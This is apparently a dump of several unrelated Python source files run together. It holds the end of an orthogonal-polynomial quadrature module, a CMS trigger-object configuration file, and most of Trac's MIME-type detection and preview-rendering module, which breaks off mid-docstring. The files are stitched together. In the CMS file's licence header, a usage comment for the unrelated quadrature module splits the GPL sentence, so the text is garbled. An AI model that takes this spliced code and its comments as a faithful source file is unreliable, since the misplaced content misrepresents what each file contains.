terms of its modifed moments which are obtained by\n integrating the monic polynomials against the weight function.\n\n References\n ----------\n\n John C. Wheeler, ""Modified moments and Gaussian quadratures""\n Rocky Mountain Journal of Mathematics, Vol. 4, Num. 2 (1974), 287--296\n\n Walter Gautschi, ""Orthogonal Polynomials (in Matlab)\n Journal of Computational and Applied Mathematics, Vol. 
178 (2005) 215--234\n\n Adapted from the MATLAB implementation:\n https://www.cs.purdue.edu/archives/2002/wxg/codes/chebyshev.m\n\n """"""\n\n if not isinstance(N, int):\n raise TypeError(\'N must be an integer\')\n\n if N < 1:\n raise ValueError(\'N must be at least 1\')\n\n N = min(N, int(len(mom) / 2))\n\n alpha = np.zeros(N)\n beta = np.zeros(N)\n normsq = np.zeros(N)\n sig = np.zeros((N + 1, 2 * N))\n\n alpha[0] = alpham[0] + mom[1] / mom[0]\n beta[0] = mom[0]\n\n sig[1, :] = mom\n\n for n in range(2, N + 1):\n for m in range(n - 1, 2 * N - n + 1):\n sig[n, m] = sig[n - 1, m + 1] - (alpha[n - 2] - alpham[m]) * sig[n - 1, m] - \\\n beta[n - 2] * sig[n - 2, m] + betam[m] * sig[n - 1, m - 1]\n\n alpha[n - 1] = alpham[n - 1] + sig[n, n] / sig[n, n - 1] - sig[n - 1, n - 1] / \\\n sig[n - 1, n - 2]\n beta[n - 1] = sig[n, n - 1] / sig[n - 1, n - 2]\n\n normsq = np.diagonal(sig, -1)\n\n return alpha, beta, normsq\n\n\ndef rec_jaclog(N, a):\n """"""\n Generate the recursion coefficients alpha_k, beta_k\n\n P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x)\n\n for the monic polynomials which are orthogonal on [0,1]\n with respect to the weight w(x)=x^a*log(1/x)\n\n Inputs:\n N - polynomial order\n a - weight parameter\n\n Outputs:\n alpha - recursion coefficients\n beta - recursion coefficients\n\n Adated from the MATLAB code:\n https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jaclog.m\n """"""\n alphaj, betaj = rec_jacobi01(2 * N, 0, 0)\n mom = mm_log(2 * N, a)\n alpha, beta, _ = mod_chebyshev(N, mom, alphaj, betaj)\n return alpha, beta\n', '## @package TriggerObjectBlock_cfi\n# Configuration file that defines the producer of ROOT-tuple for trigger objects.\n#\n# \\author Subir Sarkar\n# \\author Rosamaria Venditti (INFN Bari, Bari University)\n# \\author Konstantin Androsov (University of Siena, INFN Pisa)\n# \\author Maria Teresa Grippo (University of Siena, INFN Pisa)\n#\n# Copyright 2011-2013 Subir Sarkar, Rosamaria Venditti (INFN Bari, Bari University)\n# Copyright 2014 Konstantin Androsov dummy@email.com,\n# Maria Teresa Grippo dummy@email.com\n#\n# This file is part of X->HH->bbTauTau.\n#\n# X->HH->bbTauTau is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n#\n# X->HH->bbTauTau is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with X->HH->bbTauTau. 
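\n#\n# A short usage sketch for the quadrature module above, assuming numpy\n# imported as np and the gauss(alpha, beta) nodes-and-weights helper\n# referenced earlier in that module:\n#\n# alpha, beta = rec_jacobi(16, 0, 0) # Legendre case: w(x) = 1\n# x, w = gauss(alpha, beta)\n# np.dot(w, x ** 2) # -> 2/3, the integral of x**2 over [-1, 1]\n#\n# 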
If not, see .\n\nimport FWCore.ParameterSet.Config as cms\n\ntriggerObjectBlock = cms.EDAnalyzer(""TriggerObjectBlock"",\n verbosity = cms.int32(0),\n hltInputTag = cms.InputTag(\'TriggerResults\',\'\',\'HLT\'),\n triggerEventTag = cms.InputTag(\'patTriggerEvent\'),\n hltPathsOfInterest = cms.vstring (""HLT_DoubleMu"",\n ""HLT_Mu"",\n ""HLT_IsoMu"",\n ""HLT_TripleMu"",\n ""IsoPFTau"",\n ""TrkIsoT"",\n ""HLT_Ele""),\n May10ReRecoData = cms.bool(False)\n)\n', '# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2004-2010 Edgewall Software\n# Copyright (C) 2004 Daniel Lundin dummy@email.com\n# Copyright (C) 2005-2006 Christopher Lenz dummy@email.com\n# Copyright (C) 2006-2007 Christian Boos dummy@email.com\n# All rights reserved.\n#\n# This software is licensed as described in the file COPYING, which\n# you should have received as part of this distribution. The terms\n# are also available at http://trac.edgewall.org/wiki/TracLicense.\n#\n# This software consists of voluntary contributions made by many\n# individuals. For the exact contribution history, see the revision\n# history and logs, available at http://trac.edgewall.org/log/.\n#\n# Author: Daniel Lundin dummy@email.com\n# Christopher Lenz dummy@email.com\n# Christian Boos dummy@email.com\n\n""""""\nFile metadata management\n------------------------\n\nThe `trac.mimeview` package centralizes the intelligence related to\nfile metadata, principally concerning the `type` (MIME type) of the\ncontent and, if relevant, concerning the text encoding (charset) used\nby the content.\n\nThere are primarily two approaches for getting the MIME type of a\ngiven file, either taking advantage of existing conventions for the\nfile name, or examining the file content and applying various\nheuristics.\n\nThe module also knows how to convert the file content from one type to\nanother type.\n\nIn some cases, only the `url` pointing to the file\'s content is\nactually needed, that\'s why we avoid to read the file\'s content when\nit\'s not needed.\n\nThe actual `content` to be converted might be a `unicode` object, but\nit can also be the raw byte string (`str`) object, or simply an object\nthat can be `read()`.\n\n.. note:: (for plugin developers)\n\n The Mimeview API is quite complex and many things there are\n currently a bit difficult to work with (e.g. what an actual\n `content` might be, see the last paragraph of this description).\n\n So this area is mainly in a \'\'work in progress\'\' state, which will\n be improved along the lines described in :teo:`#3332`.\n\n In particular, if you are interested in writing `IContentConverter`\n and `IHTMLPreviewRenderer` components, note that those interfaces\n will be merged into a new style `IContentConverter`. 
Feel free to\n contribute remarks and suggestions for improvements to the\n corresponding ticket (#3332 as well).\n""""""\n\nimport re\nfrom StringIO import StringIO\n\nfrom genshi import Markup, Stream\nfrom genshi.core import TEXT, START, END, START_NS, END_NS\nfrom genshi.builder import Fragment, tag\nfrom genshi.input import HTMLParser\n\nfrom trac.config import IntOption, ListOption, Option\nfrom trac.core import *\nfrom trac.resource import Resource\nfrom trac.util import Ranges, content_disposition\nfrom trac.util.text import exception_to_unicode, to_utf8, to_unicode\nfrom trac.util.translation import _, tag_\n\n\n__all__ = [\'Context\', \'Mimeview\', \'RenderingContext\', \'get_mimetype\',\n \'is_binary\', \'detect_unicode\', \'content_to_unicode\', \'ct_mimetype\']\n\nclass RenderingContext(object):\n """"""\n A rendering context specifies \'\'how\'\' the content should be rendered.\n\n It holds together all the needed contextual information that will be\n needed by individual renderer components.\n\n To that end, a context keeps track of the Href instance (`.href`) which\n should be used as a base for building URLs.\n \n It also provides a `PermissionCache` (`.perm`) which can be used to\n restrict the output so that only the authorized information is shown.\n \n A rendering context may also be associated to some Trac resource which\n will be used as the implicit reference when rendering relative links\n or for retrieving relative content and can be used to retrieve related\n metadata.\n\n Rendering contexts can be nested, and a new context can be created from \n an existing context using the call syntax. The previous context can be\n retrieved using the `.parent` attribute.\n \n For example, when rendering a wiki text of a wiki page, the context will\n be associated to a resource identifying that wiki page.\n \n If that wiki text contains a `[[TicketQuery]]` wiki macro, the macro will\n set up nested contexts for each matching ticket that will be used for\n rendering the ticket descriptions.\n\n :since: version 0.11\n """"""\n\n def __init__(self, resource, href=None, perm=None):\n """"""Directly create a `RenderingContext`.\n\n :param resource: the associated resource\n :type resource: `Resource`\n :param href: an `Href` object suitable for creating URLs\n :param perm: a `PermissionCache` object used for restricting the\n generated output to ""authorized"" information only.\n\n The actual `.perm` attribute of the rendering context will be bound\n to the given `resource` so that fine-grained permission checks will\n apply to that.\n """"""\n self.parent = None #: The parent context, if any\n self.resource = resource\n self.href = href\n self.perm = perm(resource) if perm and resource else perm\n self._hints = None\n\n @staticmethod\n def from_request(*args, **kwargs):\n """""":deprecated: since 1.0, use `web_context` instead.""""""\n from trac.web.chrome import web_context\n return web_context(*args, **kwargs)\n\n def __repr__(self):\n path = []\n context = self\n while context:\n if context.resource.realm: # skip toplevel resource \n path.append(repr(context.resource))\n context = context.parent\n return \'<%s %s>\' % (type(self).__name__, \' - \'.join(reversed(path)))\n\n def child(self, resource=None, id=False, version=False, parent=False):\n """"""Create a nested rendering context.\n\n `self` will be the parent for the new nested context.\n\n :param resource: either a `Resource` object or the realm string for a\n resource specification to be associated to the new\n context. 
If `None`, the resource will be the same\n as the resource of the parent context.\n :param id: the identifier part of the resource specification\n :param version: the version of the resource specification\n :return: the new context object\n :rtype: `RenderingContext`\n\n >>> context = RenderingContext(\'wiki\', \'WikiStart\')\n >>> ticket1 = Resource(\'ticket\', 1)\n >>> context.child(\'ticket\', 1).resource == ticket1\n True\n >>> context.child(ticket1).resource is ticket1\n True\n >>> context.child(ticket1)().resource is ticket1\n True\n """"""\n if resource:\n resource = Resource(resource, id=id, version=version,\n parent=parent)\n else:\n resource = self.resource\n context = RenderingContext(resource, href=self.href, perm=self.perm)\n context.parent = self\n\n # hack for context instances created by from_request()\n # this is needed because various parts of the code rely on a request\n # object being available, but that will hopefully improve in the\n # future\n if hasattr(self, \'req\'):\n context.req = self.req\n\n return context\n\n __call__ = child\n\n def __contains__(self, resource):\n """"""Check whether a resource is in the rendering path.\n\n The primary use for this check is to avoid to render the content of a\n resource if we\'re already embedded in a context associated to that\n resource.\n\n :param resource: a `Resource` specification which will be checked for\n """"""\n context = self\n while context:\n if context.resource and \\\n context.resource.realm == resource.realm and \\\n context.resource.id == resource.id:\n # we don\'t care about version here\n return True\n context = context.parent\n\n # Rendering hints \n #\n # A rendering hint is a key/value pairs that can influence renderers,\n # wiki formatters and processors in the way they produce their output.\n # The keys are strings, but the values could be anything.\n #\n # In nested contexts, the hints are inherited from their parent context,\n # unless overriden locally.\n\n def set_hints(self, **keyvalues):\n """"""Set rendering hints for this rendering context.\n\n >>> ctx = RenderingContext(\'timeline\')\n >>> ctx.set_hints(wiki_flavor=\'oneliner\', shorten_lines=True)\n >>> t_ctx = ctx(\'ticket\', 1)\n >>> t_ctx.set_hints(wiki_flavor=\'html\', preserve_newlines=True)\n >>> (t_ctx.get_hint(\'wiki_flavor\'), t_ctx.get_hint(\'shorten_lines\'), \\\n t_ctx.get_hint(\'preserve_newlines\'))\n (\'html\', True, True)\n >>> (ctx.get_hint(\'wiki_flavor\'), ctx.get_hint(\'shorten_lines\'), \\\n ctx.get_hint(\'preserve_newlines\'))\n (\'oneliner\', True, None)\n """"""\n if self._hints is None:\n self._hints = {}\n hints = self._parent_hints()\n if hints is not None:\n self._hints.update(hints)\n self._hints.update(keyvalues)\n\n def get_hint(self, hint, default=None):\n """"""Retrieve a rendering hint from this context or an ancestor context.\n\n >>> ctx = RenderingContext(\'timeline\')\n >>> ctx.set_hints(wiki_flavor=\'oneliner\')\n >>> t_ctx = ctx(\'ticket\', 1)\n >>> t_ctx.get_hint(\'wiki_flavor\')\n \'oneliner\'\n >>> t_ctx.get_hint(\'preserve_newlines\', True)\n True\n """"""\n hints = self._hints\n if hints is None:\n hints = self._parent_hints()\n if hints is None:\n return default\n return hints.get(hint, default)\n\n def has_hint(self, hint):\n """"""Test whether a rendering hint is defined in this context or in some\n ancestor context.\n\n >>> ctx = RenderingContext(\'timeline\')\n >>> ctx.set_hints(wiki_flavor=\'oneliner\')\n >>> t_ctx = ctx(\'ticket\', 1)\n >>> t_ctx.has_hint(\'wiki_flavor\')\n True\n >>> 
t_ctx.has_hint(\'preserve_newlines\')\n False\n """"""\n hints = self._hints\n if hints is None:\n hints = self._parent_hints()\n if hints is None:\n return False\n return hint in hints\n\n def _parent_hints(self):\n p = self.parent\n while p and p._hints is None:\n p = p.parent\n return p and p._hints\n\n\nclass Context(RenderingContext):\n """""":deprecated: old name kept for compatibility, use `RenderingContext`.""""""\n\n\n# Some common MIME types and their associated keywords and/or file extensions\n\nKNOWN_MIME_TYPES = {\n \'application/javascript\': \'js\',\n \'application/msword\': \'doc dot\',\n \'application/pdf\': \'pdf\',\n \'application/postscript\': \'ps\',\n \'application/rtf\': \'rtf\',\n \'application/x-sh\': \'sh\',\n \'application/x-csh\': \'csh\',\n \'application/x-troff\': \'nroff roff troff\',\n \'application/x-yaml\': \'yml yaml\',\n \n \'application/rss+xml\': \'rss\',\n \'application/xsl+xml\': \'xsl\',\n \'application/xslt+xml\': \'xslt\',\n \n \'image/x-icon\': \'ico\',\n \'image/svg+xml\': \'svg\',\n \n \'model/vrml\': \'vrml wrl\',\n \n \'text/css\': \'css\',\n \'text/html\': \'html htm\',\n \'text/plain\': \'txt TXT text README INSTALL \'\n \'AUTHORS COPYING ChangeLog RELEASE\',\n \'text/xml\': \'xml\',\n \n # see also TEXT_X_TYPES below\n \'text/x-csrc\': \'c xs\',\n \'text/x-chdr\': \'h\',\n \'text/x-c++src\': \'cc CC cpp C c++ C++\',\n \'text/x-c++hdr\': \'hh HH hpp H\',\n \'text/x-csharp\': \'cs c# C#\',\n \'text/x-diff\': \'patch\',\n \'text/x-eiffel\': \'e\',\n \'text/x-elisp\': \'el\',\n \'text/x-fortran\': \'f\',\n \'text/x-haskell\': \'hs\',\n \'text/x-ini\': \'ini cfg\',\n \'text/x-objc\': \'m mm\',\n \'text/x-ocaml\': \'ml mli\',\n \'text/x-makefile\': \'make mk Makefile GNUMakefile\',\n \'text/x-pascal\': \'pas\',\n \'text/x-perl\': \'pl pm PL\',\n \'text/x-php\': \'php3 php4\',\n \'text/x-python\': \'py\',\n \'text/x-pyrex\': \'pyx\',\n \'text/x-ruby\': \'rb\',\n \'text/x-scheme\': \'scm\',\n \'text/x-textile\': \'txtl\',\n \'text/x-vba\': \'vb vba bas\',\n \'text/x-verilog\': \'v\',\n \'text/x-vhdl\': \'vhd\',\n}\nfor t in KNOWN_MIME_TYPES.keys():\n types = KNOWN_MIME_TYPES[t].split()\n if t.startswith(\'text/x-\'):\n types.append(t[len(\'text/x-\'):])\n KNOWN_MIME_TYPES[t] = types\n\n# extend the above with simple (text/x-: ) mappings\n\nTEXT_X_TYPES = """"""\n ada asm asp awk idl inf java ksh lua m4 mail psp rfc rst sql tcl tex zsh\n""""""\nfor x in TEXT_X_TYPES.split():\n KNOWN_MIME_TYPES.setdefault(\'text/x-%s\' % x, []).append(x)\n\n\n# Default mapping from keywords/extensions to known MIME types:\n\nMIME_MAP = {}\nfor t, exts in KNOWN_MIME_TYPES.items():\n MIME_MAP[t] = t\n for e in exts:\n MIME_MAP[e] = t\n\n# Simple builtin autodetection from the content using a regexp\nMODE_RE = re.compile(r""""""\n \\#!.+?env\\s+(\\w+) # 1. look for shebang with env\n | \\#!(?:[/\\w.-_]+/)?(\\w+) # 2. look for regular shebang\n | -\\*-\\s*(?:mode:\\s*)?([\\w+-]+)\\s*-\\*- # 3. look for Emacs\' -*- mode -*-\n | vim:.*?(?:syntax|filetype|ft)=(\\w+) # 4. 
look for VIM\'s syntax=\n """""", re.VERBOSE)\n\ndef get_mimetype(filename, content=None, mime_map=MIME_MAP):\n """"""Guess the most probable MIME type of a file with the given name.\n\n `filename` is either a filename (the lookup will then use the suffix)\n or some arbitrary keyword.\n \n `content` is either a `str` or an `unicode` string.\n """"""\n suffix = filename.split(\'.\')[-1]\n if suffix in mime_map:\n # 1) mimetype from the suffix, using the `mime_map`\n return mime_map[suffix]\n else:\n mimetype = None\n try:\n import mimetypes\n # 2) mimetype from the suffix, using the `mimetypes` module\n mimetype = mimetypes.guess_type(filename)[0]\n except Exception:\n pass\n if not mimetype and content:\n match = re.search(MODE_RE, content[:1000] + content[-1000:])\n if match:\n mode = match.group(1) or match.group(2) or match.group(4) or \\\n match.group(3).lower()\n if mode in mime_map:\n # 3) mimetype from the content, using the `MODE_RE`\n return mime_map[mode]\n else:\n if is_binary(content):\n # 4) mimetype from the content, using`is_binary`\n return \'application/octet-stream\'\n return mimetype\n\ndef ct_mimetype(content_type):\n """"""Return the mimetype part of a content type.""""""\n return (content_type or \'\').split(\';\')[0].strip()\n\ndef is_binary(data):\n """"""Detect binary content by checking the first thousand bytes for zeroes.\n\n Operate on either `str` or `unicode` strings.\n """"""\n if isinstance(data, str) and detect_unicode(data):\n return False\n return \'\\0\' in data[:1000]\n\ndef detect_unicode(data):\n """"""Detect different unicode charsets by looking for BOMs (Byte Order Mark).\n\n Operate obviously only on `str` objects.\n """"""\n if data.startswith(\'\\xff\\xfe\'):\n return \'utf-16-le\'\n elif data.startswith(\'\\xfe\\xff\'):\n return \'utf-16-be\'\n elif data.startswith(\'\\xef\\xbb\\xbf\'):\n return \'utf-8\'\n else:\n return None\n\ndef content_to_unicode(env, content, mimetype):\n """"""Retrieve an `unicode` object from a `content` to be previewed.\n\n In case the raw content had an unicode BOM, we remove it.\n\n >>> from trac.test import EnvironmentStub\n >>> env = EnvironmentStub()\n >>> content_to_unicode(env, u""\\ufeffNo BOM! h\\u00e9 !"", \'\')\n u\'No BOM! h\\\\xe9 !\'\n >>> content_to_unicode(env, ""\\xef\\xbb\\xbfNo BOM! h\\xc3\\xa9 !"", \'\')\n u\'No BOM! h\\\\xe9 !\'\n\n """"""\n mimeview = Mimeview(env)\n if hasattr(content, \'read\'):\n content = content.read(mimeview.max_preview_size)\n u = mimeview.to_unicode(content, mimetype)\n if u and u[0] == u\'\\ufeff\':\n u = u[1:]\n return u\n\n\nclass IHTMLPreviewRenderer(Interface):\n """"""Extension point interface for components that add HTML renderers of\n specific content types to the `Mimeview` component.\n\n .. 
note::\n\n This interface will be merged with IContentConverter, as\n conversion to text/html will simply be a particular content\n conversion.\n\n Note however that the IHTMLPreviewRenderer will still be\n supported for a while through an adapter, whereas the\n IContentConverter interface itself will be changed.\n\n So if all you want to do is convert to HTML and don\'t feel like\n following the API changes, you should rather implement this\n interface for the time being.\n """"""\n\n #: implementing classes should set this property to True if they\n #: support text content where Trac should expand tabs into spaces\n expand_tabs = False\n\n #: indicate whether the output of this renderer is source code that can\n #: be decorated with annotations\n returns_source = False\n\n def get_quality_ratio(mimetype):\n """"""Return the level of support this renderer provides for the `content`\n of the specified MIME type. The return value must be a number between\n 0 and 9, where 0 means no support and 9 means ""perfect"" support.\n """"""\n\n def render(context, mimetype, content, filename=None, url=None):\n """"""Render an XHTML preview of the raw `content` in a RenderingContext.\n\n The `content` might be:\n * a `str` object\n * an `unicode` string\n * any object with a `read` method, returning one of the above\n\n It is assumed that the content will correspond to the given `mimetype`.\n\n Besides the `content` value, the same content may eventually\n be available through the `filename` or `url` parameters.\n This is useful for renderers that embed objects, using or\n instead of including the content inline.\n \n Can return the generated XHTML text as a single string or as an\n iterable that yields strings. In the latter case, the list will\n be considered to correspond to lines of text in the original content.\n """"""\n\n\nclass IHTMLPreviewAnnotator(Interface):\n """"""Extension point interface for components that can annotate an XHTML\n representation of file contents with additional information.""""""\n\n def get_annotation_type():\n """"""Return a (type, label, description) tuple\n that defines the type of annotation and provides human readable names.\n The `type` element should be unique to the annotator.\n The `label` element is used as column heading for the table,\n while `description` is used as a display name to let the user\n toggle the appearance of the annotation type.\n """"""\n \n def get_annotation_data(context):\n """"""Return some metadata to be used by the `annotate_row` method below.\n\n This will be called only once, before lines are processed.\n If this raises an error, that annotator won\'t be used.\n """"""\n\n def annotate_row(context, row, number, line, data):\n """"""Return the XHTML markup for the table cell that contains the\n annotation data.\n\n `context` is the context corresponding to the content being annotated,\n `row` is the tr Element being built, `number` is the line number being\n processed and `line` is the line\'s actual content.\n `data` is whatever additional data the `get_annotation_data` method\n decided to provide.\n """"""\n\n\nclass IContentConverter(Interface):\n """"""An extension point interface for generic MIME based content\n conversion.\n\n .. 
note:: This api will likely change in the future (see :teo:`#3332`)\n\n """"""\n\n def get_supported_conversions():\n """"""Return an iterable of tuples in the form (key, name, extension,\n in_mimetype, out_mimetype, quality) representing the MIME conversions\n supported and\n the quality ratio of the conversion in the range 0 to 9, where 0 means\n no support and 9 means ""perfect"" support. eg. (\'latex\', \'LaTeX\', \'tex\',\n \'text/x-trac-wiki\', \'text/plain\', 8)""""""\n\n def convert_content(req, mimetype, content, key):\n """"""Convert the given content from mimetype to the output MIME type\n represented by key. Returns a tuple in the form (content,\n output_mime_type) or None if conversion is not possible.""""""\n\n\nclass Content(object):\n """"""A lazy file-like object that only reads `input` if necessary.""""""\n def __init__(self, input, max_size):\n self.input = input\n self.max_size = max_size\n self.content = None\n \n def read(self, size=-1):\n if size == 0:\n return \'\'\n if self.content is None:\n self.content = StringIO(self.input.read(self.max_size))\n return self.content.read(size)\n \n def reset(self):\n if self.content is not None:\n self.content.seek(0)\n\n\nclass Mimeview(Component):\n """"""Generic HTML renderer for data, typically source code.""""""\n\n required = True\n\n renderers = ExtensionPoint(IHTMLPreviewRenderer)\n annotators = ExtensionPoint(IHTMLPreviewAnnotator)\n converters = ExtensionPoint(IContentConverter)\n\n default_charset = Option(\'trac\', \'default_charset\', \'utf-8\',\n """"""Charset to be used when in doubt."""""")\n\n tab_width = IntOption(\'mimeviewer\', \'tab_width\', 8,\n """"""Displayed tab width in file preview. (\'\'since 0.9\'\')"""""")\n\n max_preview_size = IntOption(\'mimeviewer\', \'max_preview_size\', 262144,\n """"""Maximum file size for HTML preview. (\'\'since 0.9\'\')"""""")\n\n mime_map = ListOption(\'mimeviewer\', \'mime_map\',\n \'text/x-dylan:dylan, text/x-idl:ice, text/x-ada:ads:adb\',\n doc=""""""List of additional MIME types and keyword mappings.\n Mappings are comma-separated, and for each MIME type,\n there\'s a colon ("":"") separated list of associated keywords\n or file extensions. (\'\'since 0.10\'\')"""""")\n\n treat_as_binary = ListOption(\'mimeviewer\', \'treat_as_binary\',\n \'application/octet-stream, application/pdf, application/postscript, \'\n \'application/msword,application/rtf,\',\n doc=""""""Comma-separated list of MIME types that should be treated as\n binary data. (\'\'since 0.11.5\'\')"""""")\n\n def __init__(self):\n self._mime_map = None\n\n # Public API\n\n def get_supported_conversions(self, mimetype):\n """"""Return a list of target MIME types in same form as\n `IContentConverter.get_supported_conversions()`, but with the converter\n component appended. Output is ordered from best to worst quality.""""""\n converters = []\n for converter in self.converters:\n conversions = converter.get_supported_conversions() or []\n for k, n, e, im, om, q in conversions:\n if im == mimetype and q > 0:\n converters.append((k, n, e, im, om, q, converter))\n converters = sorted(converters, key=lambda i: i[-2], reverse=True)\n return converters\n\n def convert_content(self, req, mimetype, content, key, filename=None,\n url=None):\n """"""Convert the given content to the target MIME type represented by\n `key`, which can be either a MIME type or a key. 
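For example, if the\n hypothetical LaTeX converter from the interface docstring above were\n registered, convert_content(req, \'text/x-trac-wiki\', text, \'latex\')\n would try it first, since candidates are ordered from best to worst\n quality and the first successful conversion wins. 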
Returns a tuple of\n (content, output_mime_type, extension).""""""\n if not content:\n return (\'\', \'text/plain;charset=utf-8\', \'.txt\')\n\n # Ensure we have a MIME type for this content\n full_mimetype = mimetype\n if not full_mimetype:\n if hasattr(content, \'read\'):\n content = content.read(self.max_preview_size)\n full_mimetype = self.get_mimetype(filename, content)\n if full_mimetype:\n mimetype = ct_mimetype(full_mimetype) # split off charset\n else:\n mimetype = full_mimetype = \'text/plain\' # fallback if not binary\n\n # Choose best converter\n candidates = list(self.get_supported_conversions(mimetype) or [])\n candidates = [c for c in candidates if key in (c[0], c[4])]\n if not candidates:\n raise TracError(\n _(""No available MIME conversions from %(old)s to %(new)s"",\n old=mimetype, new=key))\n\n # First successful conversion wins\n for ck, name, ext, input_mimettype, output_mimetype, quality, \\\n converter in candidates:\n output = converter.convert_content(req, mimetype, content, ck)\n if output:\n return (output[0], output[1], ext)\n raise TracError(\n _(""No available MIME conversions from %(old)s to %(new)s"",\n old=mimetype, new=key))\n\n def get_annotation_types(self):\n """"""Generator that returns all available annotation types.""""""\n for annotator in self.annotators:\n yield annotator.get_annotation_type()\n\n def render(self, context, mimetype, content, filename=None, url=None,\n annotations=None, force_source=False):\n """"""Render an XHTML preview of the given `content`.\n\n `content` is the same as an `IHTMLPreviewRenderer.render`\'s\n `content` argument.\n\n The specified `mimetype` will be used to select the most appropriate\n `IHTMLPreviewRenderer` implementation available for this MIME type.\n If not given, the MIME type will be infered from the filename or the\n content.\n\n Return a string containing the XHTML text.\n \n When rendering with an `IHTMLPreviewRenderer` fails, a warning is added\n to the request associated with the context (if any), unless the\n `disable_warnings` hint is set to `True`.\n """"""\n if not content:\n return \'\'\n if not isinstance(context, RenderingContext):\n raise TypeError(""RenderingContext expected (since 0.11)"")\n\n # Ensure we have a MIME type for this content\n full_mimetype = mimetype\n if not full_mimetype:\n if hasattr(content, \'read\'):\n content = content.read(self.max_preview_size)\n full_mimetype = self.get_mimetype(filename, content)\n if full_mimetype:\n mimetype = ct_mimetype(full_mimetype) # split off charset\n else:\n mimetype = full_mimetype = \'text/plain\' # fallback if not binary\n\n # Determine candidate `IHTMLPreviewRenderer`s\n candidates = []\n for renderer in self.renderers:\n qr = renderer.get_quality_ratio(mimetype)\n if qr > 0:\n candidates.append((qr, renderer))\n candidates.sort(lambda x, y: cmp(y[0], x[0]))\n \n # Wrap file-like object so that it can be read multiple times\n if hasattr(content, \'read\'):\n content = Content(content, self.max_preview_size)\n\n # First candidate which renders successfully wins.\n # Also, we don\'t want to expand tabs more than once.\n expanded_content = None\n for qr, renderer in candidates:\n if force_source and not getattr(renderer, \'returns_source\', False):\n continue # skip non-source renderers in force_source mode\n if isinstance(content, Content):\n content.reset()\n try:\n ann_names = \', \'.join(annotations) if annotations else \\\n \'no annotations\'\n self.log.debug(\'Trying to render HTML preview using %s [%s]\',\n 
renderer.__class__.__name__, ann_names)\n\n # check if we need to perform a tab expansion\n rendered_content = content\n if getattr(renderer, \'expand_tabs\', False):\n if expanded_content is None:\n content = content_to_unicode(self.env, content,\n full_mimetype)\n expanded_content = content.expandtabs(self.tab_width)\n rendered_content = expanded_content\n\n result = renderer.render(context, full_mimetype,\n rendered_content, filename, url)\n if not result:\n continue\n\n if not (force_source or getattr(renderer, \'returns_source\',\n False)):\n # Direct rendering of content\n if isinstance(result, basestring):\n if not isinstance(result, unicode):\n result = to_unicode(result)\n return Markup(to_unicode(result))\n elif isinstance(result, Fragment):\n return result.generate()\n else:\n return result\n\n # Render content as source code\n if annotations:\n m = context.req.args.get(\'marks\') if context.req else None\n return self._render_source(context, result, annotations,\n m and Ranges(m))\n else:\n if isinstance(result, list):\n result = Markup(\'\\n\').join(result)\n return tag.div(class_=\'code\')(tag.pre(result)).generate()\n\n except Exception, e:\n self.log.warning(\'HTML preview using %s failed: %s\',\n renderer.__class__.__name__,\n exception_to_unicode(e, traceback=True))\n if context.req and not context.get_hint(\'disable_warnings\'):\n from trac.web.chrome import add_warning\n add_warning(context.req,\n _(""HTML preview using %(renderer)s failed (%(err)s)"",\n renderer=renderer.__class__.__name__,\n err=exception_to_unicode(e)))\n\n def _render_source(self, context, stream, annotations, marks=None):\n from trac.web.chrome import add_warning\n annotators, labels, titles = {}, {}, {}\n for annotator in self.annotators:\n atype, alabel, atitle = annotator.get_annotation_type()\n if atype in annotations:\n labels[atype] = alabel\n titles[atype] = atitle\n annotators[atype] = annotator\n annotations = [a for a in annotations if a in annotators]\n\n if isinstance(stream, list):\n stream = HTMLParser(StringIO(u\'\\n\'.join(stream)))\n elif isinstance(stream, unicode):\n text = stream\n def linesplitter():\n for line in text.splitlines(True):\n yield TEXT, line, (None, -1, -1)\n stream = linesplitter()\n\n annotator_datas = []\n for a in annotations:\n annotator = annotators[a]\n try:\n data = (annotator, annotator.get_annotation_data(context))\n except TracError, e:\n self.log.warning(""Can\'t use annotator \'%s\': %s"", a, e.message)\n add_warning(context.req, tag.strong(\n tag_(""Can\'t use %(annotator)s annotator: %(error)s"",\n annotator=tag.em(a), error=tag.pre(e.message))))\n data = (None, None)\n annotator_datas.append(data)\n\n def _head_row():\n return tag.tr(\n [tag.th(labels[a], class_=a, title=titles[a])\n for a in annotations] +\n [tag.th(u\'\\xa0\', class_=\'content\')]\n )\n\n def _body_rows():\n for idx, line in enumerate(_group_lines(stream)):\n row = tag.tr()\n if marks and idx + 1 in marks:\n row(class_=\'hilite\')\n for annotator, data in annotator_datas:\n if annotator:\n annotator.annotate_row(context, row, idx+1, line, data)\n else:\n row.append(tag.td())\n row.append(tag.td(line))\n yield row\n\n return tag.table(class_=\'code\')(\n tag.thead(_head_row()),\n tag.tbody(_body_rows())\n )\n\n def get_max_preview_size(self):\n """""":deprecated: use `max_preview_size` attribute directly.""""""\n return self.max_preview_size\n\n def get_charset(self, content=\'\', mimetype=None):\n """"""Infer the character encoding from the `content` or the `mimetype`.\n\n 
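For example, get_charset(mimetype=\'text/html; charset=ISO-8859-1\')\n returns \'ISO-8859-1\' straight from the type, while a leading UTF-16\n BOM in `content` is picked up via detect_unicode.\n\n 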
`content` is either a `str` or an `unicode` object.\n \n The charset will be determined using this order:\n * from the charset information present in the `mimetype` argument\n * auto-detection of the charset from the `content`\n * the configured `default_charset` \n """"""\n if mimetype:\n ctpos = mimetype.find(\'charset=\')\n if ctpos >= 0:\n return mimetype[ctpos + 8:].strip()\n if isinstance(content, str):\n utf = detect_unicode(content)\n if utf is not None:\n return utf\n return self.default_charset\n\n @property\n def mime_map(self):\n # Extend default extension to MIME type mappings with configured ones\n if not self._mime_map:\n self._mime_map = MIME_MAP.copy()\n for mapping in self.config[\'mimeviewer\'].getlist(\'mime_map\'):\n if \':\' in mapping:\n assocations = mapping.split(\':\')\n for keyword in assocations: # Note: [0] kept on purpose\n self._mime_map[keyword] = assocations[0]\n return self._mime_map\n\n def get_mimetype(self, filename, content=None):\n """"""Infer the MIME type from the `filename` or the `content`.\n\n `content` is either a `str` or an `unicode` object.\n\n Return the detected MIME type, augmented by the\n charset information (i.e. ""; charset=...""),\n or 